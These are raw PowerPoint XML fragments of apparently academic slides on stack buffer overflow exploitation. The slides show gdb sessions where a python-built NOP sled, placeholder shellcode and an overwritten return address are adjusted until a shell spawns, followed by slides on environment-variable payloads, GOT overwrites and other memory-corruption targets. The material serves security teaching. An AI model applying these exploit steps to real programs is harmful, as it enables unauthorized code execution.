                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'*512</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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Program received signal SIGSEGV, Segmentation fault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xffc65cff </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>in ?? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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r `python -c "print '\x90'*400 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>SHELLCODE + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'a' + '\x5c\xc6\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'*512</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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Program received signal SIGSEGV, Segmentation fault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xc65cffff </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>in ?? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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r `python -c "print '\x90'*400 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>SHELLCODE + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'aa' + '\x5c\xc6\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'*512</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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Program received signal SIGSEGV, Segmentation fault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x5cffffc6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>in ?? ()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>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r `python -c "print '\x90'*400 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>SHELLCODE + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>aaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '\x5c\xc6\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'*512</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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process 25348 is executing new program: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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211</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116947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pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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a.out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> `python -c "print '\x90'*400 + SHELLCODE + '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>aaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '\x5c\xc6\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'*512"`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Segmentation fault (core dumped)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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a.out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> `python -c "print '\x90'*400 + SHELLCODE + '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>aaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '\x5c\xc7\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'*512</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh-4.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="20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212</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="191960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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Overflowing Small Buffers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="568323" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A buffer could be too small to contain the shell code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the program has access to the parent process environment </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Place the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NOP + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>an environment variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pass an overflowing string containing the address of the environment variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Advantage: the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NOP can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>be as big as desired</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22164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8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8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8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8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Generalizing Memory Corruption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What is overwritten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Return address/frame pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pointer to function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pointer to data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Variable value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What causes the overwrite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unchecked copying overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Array indexing overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Loop overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Where is overwritten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Heap/BSS/DATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GOT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24920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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What Is Overwritten</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="623619" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>reference to a value that can be overwritten can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>represent a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>security vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Changing the value of a variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pointers to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>strings or array contents </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>t.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>becomes “/etc/shadow”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Integer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>values (e.g., value of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> variable that is passed to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Changing the value of the saved base pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By overwriting the old base pointer it is possible to force the process to use a function frame determined by the attacker when returning from a function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An additional return operation would jump to a destination selected by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Changing the value of a function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Changing the value of the GOT entry for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>() to point to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> will invoke the code when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>() is invoked</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8198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3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3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36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36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36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36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36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36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2" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is Overwritten: Long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Jumps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1097733" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setjump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>longjump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() are used to perform non-local, inter-procedural direct control transfer from one point in a program to another</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Similar to a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
